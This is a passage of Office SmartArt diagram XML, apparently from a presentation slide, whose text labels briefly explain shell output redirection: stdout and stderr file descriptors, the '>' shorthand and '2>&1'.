      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED1B876D-F2E4-494B-97FC-B057850BCD24}" type="sibTrans" cxnId="{1AFD7B3D-68FD-4693-93CF-E56ED4AE1DFC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C740BD0E-8C3B-43A5-B49F-9B2E5917E337}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>You can redirect these outputs to a different place (like a file);</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8F092DD-049F-4206-A292-9164F1D6833E}" type="parTrans" cxnId="{C8216E25-D689-4717-A67D-1C19CD3D8C4E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CB7E91A0-188C-49F0-8836-E62F023A973E}" type="sibTrans" cxnId="{C8216E25-D689-4717-A67D-1C19CD3D8C4E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3001BD0E-36AB-4E67-BE15-6A9C23B6753C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>File descriptors are used to identify stdout (1) and stderr (2);</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A06259A-6181-4517-A6D2-216494B6B41F}" type="parTrans" cxnId="{593F49A9-BD1B-48C1-AA90-6DBE9D98FED9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06217971-3666-4A37-97D9-3D65509A4B0B}" type="sibTrans" cxnId="{593F49A9-BD1B-48C1-AA90-6DBE9D98FED9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4AA89CED-36AA-4518-92E0-87757BDCF75E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>command &gt; output is just a shortcut for command 1&gt; output;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E319DC0D-8CB0-4532-8E06-456ED71C3F19}" type="parTrans" cxnId="{23BCC2A0-B3A4-416E-B08F-30CF66EA2292}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2E22FAB0-F2E6-4D54-9CA0-E8BA83CE3B60}" type="sibTrans" cxnId="{23BCC2A0-B3A4-416E-B08F-30CF66EA2292}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{92C0E0D3-E323-4F00-9CEC-827E255B5508}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>You can use &amp;[FILE_DESCRIPTOR] to reference a file descriptor value;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06E96879-A389-4633-AC1A-E9D67AFD0AB7}" type="parTrans" cxnId="{F1B4AD5C-A8A7-4BBF-81D9-C8E051252BF1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{26F172A4-F503-4DE0-9102-4FA52164763F}" type="sibTrans" cxnId="{F1B4AD5C-A8A7-4BBF-81D9-C8E051252BF1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F72E37F-6E31-4C97-AC92-9A95FA6F768A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Using 2&gt;&amp;1 will redirect stderr to whatever value is set to stdout (and 1&gt;&amp;2 will do the opposite).</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9AA46F0-5791-497C-A9F8-558480C963F7}" type="parTrans" cxnId="{3D8B28DF-E221-486D-BB80-044001F9DFF2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{46B42D97-441D-4391-9E56-86AD960A6F4F}" type="sibTrans" cxnId="{3D8B28DF-E221-486D-BB80-044001F9DFF2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" type="pres">
      <dgm:prSet presAssocID="{602D1FCA-0D40-4885-9502-EE3710779E2F}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{540736C1-44E3-41E0-A55C-89E70F915AB8}" type="pres">
      <dgm:prSet presAssocID="{FAB2423C-27B3-411F-817F-7C361E1F91FC}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3CF88368-8276-471A-A40A-8843C73DF173}" type="pres">
      <dgm:prSet presAssocID="{FAB2423C-27B3-411F-817F-7C361E1F91F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20BE3BAF-DF7D-4B4D-8AB3-23B84697FB92}" type="pres">
      <dgm:prSet presAssocID="{FAB2423C-27B3-411F-817F-7C361E1F91FC}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{74A0EA44-A96C-4C24-8580-64AB96E73839}" type="pres">
      <dgm:prSet presAssocID="{FAB2423C-27B3-411F-817F-7C361E1F91FC}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7C30B7AD-A876-48D2-BF36-EA0FB7C0DA08}" type="pres">
      <dgm:prSet presAssocID="{ED1B876D-F2E4-494B-97FC-B057850BCD24}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{851B66EE-E101-4CC5-905B-7CDF702C9EFD}" type="pres">
      <dgm:prSet presAssocID="{C740BD0E-8C3B-43A5-B49F-9B2E5917E337}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E163AF8E-1215-4D26-8A36-97DCBF7D7F1B}" type="pres">
      <dgm:prSet presAssocID="{C740BD0E-8C3B-43A5-B49F-9B2E5917E33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rsor"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{15FFEF98-6DBF-4210-AC35-58A91629BAB4}" type="pres">
      <dgm:prSet presAssocID="{C740BD0E-8C3B-43A5-B49F-9B2E5917E337}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2801E6B8-4A73-4C3F-9111-284A9C8AF57F}" type="pres">
      <dgm:prSet presAssocID="{C740BD0E-8C3B-43A5-B49F-9B2E5917E337}" presName="textRect" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{934D7419-5234-4397-821F-92E1A963EF63}" type="pres">
      <dgm:prSet presAssocID="{CB7E91A0-188C-49F0-8836-E62F023A973E}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{11778F04-C2CB-4C02-80B8-A6BFAD545784}" type="pres">
      <dgm:prSet presAssocID="{3001BD0E-36AB-4E67-BE15-6A9C23B6753C}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1EEE94CC-2C28-4F97-8528-9C5C648E47F3}" type="pres">
      <dgm:prSet presAssocID="{3001BD0E-36AB-4E67-BE15-6A9C23B6753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ce"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{EDB1C461-2BCC-4734-AEB8-2FCA10D27217}" type="pres">
      <dgm:prSet presAssocID="{3001BD0E-36AB-4E67-BE15-6A9C23B6753C}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{70320A24-EF85-4312-A899-99BBE36CD8BA}" type="pres">
      <dgm:prSet presAssocID="{3001BD0E-36AB-4E67-BE15-6A9C23B6753C}" presName="textRect" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B6B14AED-6A11-424F-AA7C-28F220A80EC1}" type="pres">
      <dgm:prSet presAssocID="{06217971-3666-4A37-97D9-3D65509A4B0B}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{66DB9E5D-C128-4A9E-B32C-CC33D19DF1F5}" type="pres">
      <dgm:prSet presAssocID="{4AA89CED-36AA-4518-92E0-87757BDCF75E}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D16BF0E6-479D-4924-B7F5-F82D72AF8F8F}" type="pres">
      <dgm:prSet presAssocID="{4AA89CED-36AA-4518-92E0-87757BDCF75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owchart"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{F1C44124-5AFC-4DAA-8709-AFDF556A08A3}" type="pres">
      <dgm:prSet presAssocID="{4AA89CED-36AA-4518-92E0-87757BDCF75E}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99576F12-437F-411F-BD19-C98DF4696C5A}" type="pres">
      <dgm:prSet presAssocID="{4AA89CED-36AA-4518-92E0-87757BDCF75E}" presName="textRect" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1373A811-39C8-4044-9874-96D3C91786FE}" type="pres">
      <dgm:prSet presAssocID="{2E22FAB0-F2E6-4D54-9CA0-E8BA83CE3B60}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3617451D-B0B3-44DD-BC9A-F3768527C20C}" type="pres">
      <dgm:prSet presAssocID="{92C0E0D3-E323-4F00-9CEC-827E255B5508}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2A920D47-CC62-4189-A54B-CD80B5B91CF5}" type="pres">
      <dgm:prSet presAssocID="{92C0E0D3-E323-4F00-9CEC-827E255B550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mages"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{84BB6800-7BAD-4422-8D6D-C7F700C7F977}" type="pres">
      <dgm:prSet presAssocID="{92C0E0D3-E323-4F00-9CEC-827E255B5508}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3FBFD4AB-9F9B-4113-8DB1-4AC637568A32}" type="pres">
      <dgm:prSet presAssocID="{92C0E0D3-E323-4F00-9CEC-827E255B5508}" presName="textRect" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B2E73925-7B2F-4204-938C-E9139DFC79F4}" type="pres">
      <dgm:prSet presAssocID="{26F172A4-F503-4DE0-9102-4FA52164763F}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2CD8BE19-65E1-4762-913A-3A404162ACD6}" type="pres">
      <dgm:prSet presAssocID="{3F72E37F-6E31-4C97-AC92-9A95FA6F768A}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C439E1C6-CCCF-42DB-BAAB-1A534A55E923}" type="pres">
      <dgm:prSet presAssocID="{3F72E37F-6E31-4C97-AC92-9A95FA6F768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nected"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{0F8E9A6D-C32F-47A1-9524-5DD8F836DFFF}" type="pres">
      <dgm:prSet presAssocID="{3F72E37F-6E31-4C97-AC92-9A95FA6F768A}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C0B2FD82-F60E-46C0-8C17-15A7F5741DED}" type="pres">
      <dgm:prSet presAssocID="{3F72E37F-6E31-4C97-AC92-9A95FA6F768A}" presName="textRect" presStyleLbl="revTx" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{4FB60D15-3B8C-4F73-9F06-D50CD56047BE}" type="presOf" srcId="{3F72E37F-6E31-4C97-AC92-9A95FA6F768A}" destId="{C0B2FD82-F60E-46C0-8C17-15A7F5741DED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{C8216E25-D689-4717-A67D-1C19CD3D8C4E}" srcId="{602D1FCA-0D40-4885-9502-EE3710779E2F}" destId="{C740BD0E-8C3B-43A5-B49F-9B2E5917E337}" srcOrd="1" destOrd="0" parTransId="{E8F092DD-049F-4206-A292-9164F1D6833E}" sibTransId="{CB7E91A0-188C-49F0-8836-E62F023A973E}"/>
    <dgm:cxn modelId="{F5E78335-74D4-4FA1-A76A-7E7B43E3326E}" type="presOf" srcId="{602D1FCA-0D40-4885-9502-EE3710779E2F}" destId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{1AFD7B3D-68FD-4693-93CF-E56ED4AE1DFC}" srcId="{602D1FCA-0D40-4885-9502-EE3710779E2F}" destId="{FAB2423C-27B3-411F-817F-7C361E1F91FC}" srcOrd="0" destOrd="0" parTransId="{97E8125D-D4FF-4570-8E54-688A28EBE19C}" sibTransId="{ED1B876D-F2E4-494B-97FC-B057850BCD24}"/>
    <dgm:cxn modelId="{F1B4AD5C-A8A7-4BBF-81D9-C8E051252BF1}" srcId="{602D1FCA-0D40-4885-9502-EE3710779E2F}" destId="{92C0E0D3-E323-4F00-9CEC-827E255B5508}" srcOrd="4" destOrd="0" parTransId="{06E96879-A389-4633-AC1A-E9D67AFD0AB7}" sibTransId="{26F172A4-F503-4DE0-9102-4FA52164763F}"/>
    <dgm:cxn modelId="{674AB07C-04E4-46E4-A3FE-9DBC98A34239}" type="presOf" srcId="{C740BD0E-8C3B-43A5-B49F-9B2E5917E337}" destId="{2801E6B8-4A73-4C3F-9111-284A9C8AF57F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{2014B37C-0848-4E12-9BD7-629528AE55EB}" type="presOf" srcId="{FAB2423C-27B3-411F-817F-7C361E1F91FC}" destId="{74A0EA44-A96C-4C24-8580-64AB96E73839}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{D3EAF79B-C5F0-448F-BFB4-483A386DD16F}" type="presOf" srcId="{4AA89CED-36AA-4518-92E0-87757BDCF75E}" destId="{99576F12-437F-411F-BD19-C98DF4696C5A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{23BCC2A0-B3A4-416E-B08F-30CF66EA2292}" srcId="{602D1FCA-0D40-4885-9502-EE3710779E2F}" destId="{4AA89CED-36AA-4518-92E0-87757BDCF75E}" srcOrd="3" destOrd="0" parTransId="{E319DC0D-8CB0-4532-8E06-456ED71C3F19}" sibTransId="{2E22FAB0-F2E6-4D54-9CA0-E8BA83CE3B60}"/>
    <dgm:cxn modelId="{593F49A9-BD1B-48C1-AA90-6DBE9D98FED9}" srcId="{602D1FCA-0D40-4885-9502-EE3710779E2F}" destId="{3001BD0E-36AB-4E67-BE15-6A9C23B6753C}" srcOrd="2" destOrd="0" parTransId="{5A06259A-6181-4517-A6D2-216494B6B41F}" sibTransId="{06217971-3666-4A37-97D9-3D65509A4B0B}"/>
    <dgm:cxn modelId="{D7BA95C6-D3EF-4375-BD35-85DC11E56DE6}" type="presOf" srcId="{92C0E0D3-E323-4F00-9CEC-827E255B5508}" destId="{3FBFD4AB-9F9B-4113-8DB1-4AC637568A32}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{3D8B28DF-E221-486D-BB80-044001F9DFF2}" srcId="{602D1FCA-0D40-4885-9502-EE3710779E2F}" destId="{3F72E37F-6E31-4C97-AC92-9A95FA6F768A}" srcOrd="5" destOrd="0" parTransId="{A9AA46F0-5791-497C-A9F8-558480C963F7}" sibTransId="{46B42D97-441D-4391-9E56-86AD960A6F4F}"/>
    <dgm:cxn modelId="{9C3DCBF8-487F-4F2B-B2F8-B6490D2383D8}" type="presOf" srcId="{3001BD0E-36AB-4E67-BE15-6A9C23B6753C}" destId="{70320A24-EF85-4312-A899-99BBE36CD8BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{66890A5C-4188-4463-91BF-5E8D4DB3C5C0}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{540736C1-44E3-41E0-A55C-89E70F915AB8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{E8BD736F-810A-4F67-9C44-BB8CDC4DDE05}" type="presParOf" srcId="{540736C1-44E3-41E0-A55C-89E70F915AB8}" destId="{3CF88368-8276-471A-A40A-8843C73DF173}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{18CA8D09-4C6A-4006-B5E9-65C62647817F}" type="presParOf" srcId="{540736C1-44E3-41E0-A55C-89E70F915AB8}" destId="{20BE3BAF-DF7D-4B4D-8AB3-23B84697FB92}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{2E956AC4-D429-4895-A0BA-315B199253E6}" type="presParOf" srcId="{540736C1-44E3-41E0-A55C-89E70F915AB8}" destId="{74A0EA44-A96C-4C24-8580-64AB96E73839}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{07A0F5C0-62A7-40E2-91DA-42BA8349EC61}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{7C30B7AD-A876-48D2-BF36-EA0FB7C0DA08}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{3535327A-7817-41AA-A83E-BE05A70F6BE5}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{851B66EE-E101-4CC5-905B-7CDF702C9EFD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{2BCE54F9-62EA-4441-9531-AC5F4A227919}" type="presParOf" srcId="{851B66EE-E101-4CC5-905B-7CDF702C9EFD}" destId="{E163AF8E-1215-4D26-8A36-97DCBF7D7F1B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{77612C80-D8A4-4CB3-977D-6130A921440D}" type="presParOf" srcId="{851B66EE-E101-4CC5-905B-7CDF702C9EFD}" destId="{15FFEF98-6DBF-4210-AC35-58A91629BAB4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{0AA1AC43-503B-4025-AA52-CEB318F82BEA}" type="presParOf" srcId="{851B66EE-E101-4CC5-905B-7CDF702C9EFD}" destId="{2801E6B8-4A73-4C3F-9111-284A9C8AF57F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{1481AC49-C925-492C-91A8-B3FBD36905CC}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{934D7419-5234-4397-821F-92E1A963EF63}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{97071213-3E9B-4D95-99BC-D9AEFFB1365E}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{11778F04-C2CB-4C02-80B8-A6BFAD545784}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{DC75C3F4-0B12-4767-8EBA-679DC6DE83D2}" type="presParOf" srcId="{11778F04-C2CB-4C02-80B8-A6BFAD545784}" destId="{1EEE94CC-2C28-4F97-8528-9C5C648E47F3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{93728488-C0A3-4E5D-ACD3-B7FD48ED0F6D}" type="presParOf" srcId="{11778F04-C2CB-4C02-80B8-A6BFAD545784}" destId="{EDB1C461-2BCC-4734-AEB8-2FCA10D27217}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{E5D10D36-5B2E-40A4-BBBC-FADA662A80B3}" type="presParOf" srcId="{11778F04-C2CB-4C02-80B8-A6BFAD545784}" destId="{70320A24-EF85-4312-A899-99BBE36CD8BA}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{65494E25-6EEB-4A53-86E6-0D81E473F8FD}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{B6B14AED-6A11-424F-AA7C-28F220A80EC1}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{DBE01884-1282-4659-B21D-5B9957316B18}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{66DB9E5D-C128-4A9E-B32C-CC33D19DF1F5}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{9A8C3496-81E2-476F-B679-58222C84F191}" type="presParOf" srcId="{66DB9E5D-C128-4A9E-B32C-CC33D19DF1F5}" destId="{D16BF0E6-479D-4924-B7F5-F82D72AF8F8F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{2E69B0A9-ED98-406D-BA4E-7DF9952225D6}" type="presParOf" srcId="{66DB9E5D-C128-4A9E-B32C-CC33D19DF1F5}" destId="{F1C44124-5AFC-4DAA-8709-AFDF556A08A3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{B219474A-C29E-4362-B729-522BAEA8A0A7}" type="presParOf" srcId="{66DB9E5D-C128-4A9E-B32C-CC33D19DF1F5}" destId="{99576F12-437F-411F-BD19-C98DF4696C5A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{1755F735-B81B-43A2-AB15-B9D20D063ED9}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{1373A811-39C8-4044-9874-96D3C91786FE}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{13DE3043-59CF-4EC6-85A8-5BC8F6E8F06F}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{3617451D-B0B3-44DD-BC9A-F3768527C20C}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{80577F85-983B-498B-85AE-F170D8E1FB20}" type="presParOf" srcId="{3617451D-B0B3-44DD-BC9A-F3768527C20C}" destId="{2A920D47-CC62-4189-A54B-CD80B5B91CF5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{09C01B93-93EE-4651-A84D-48FB59B8E4F1}" type="presParOf" srcId="{3617451D-B0B3-44DD-BC9A-F3768527C20C}" destId="{84BB6800-7BAD-4422-8D6D-C7F700C7F977}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{AF51C695-5C1D-4130-938C-054790955977}" type="presParOf" srcId="{3617451D-B0B3-44DD-BC9A-F3768527C20C}" destId="{3FBFD4AB-9F9B-4113-8DB1-4AC637568A32}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{79E93D35-953F-400A-B2D2-E8377FE85D83}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{B2E73925-7B2F-4204-938C-E9139DFC79F4}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{6B15AB75-BC05-4217-B63D-3673FA475BA8}" type="presParOf" srcId="{ECE62B82-6E26-456E-8DC6-F057FC4FB70F}" destId="{2CD8BE19-65E1-4762-913A-3A404162ACD6}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{AF1CD1CF-B881-44DF-AFA9-28FD33838527}" type="presParOf" srcId="{2CD8BE19-65E1-4762-913A-3A404162ACD6}" destId="{C439E1C6-CCCF-42DB-BAAB-1A534A55E923}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{12A079BA-26D3-4DB8-B22D-71F2A787E521}" type="presParOf" srcId="{2CD8BE19-65E1-4762-913A-3A404162ACD6}" destId="{0F8E9A6D-C32F-47A1-9524-5DD8F836DFFF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
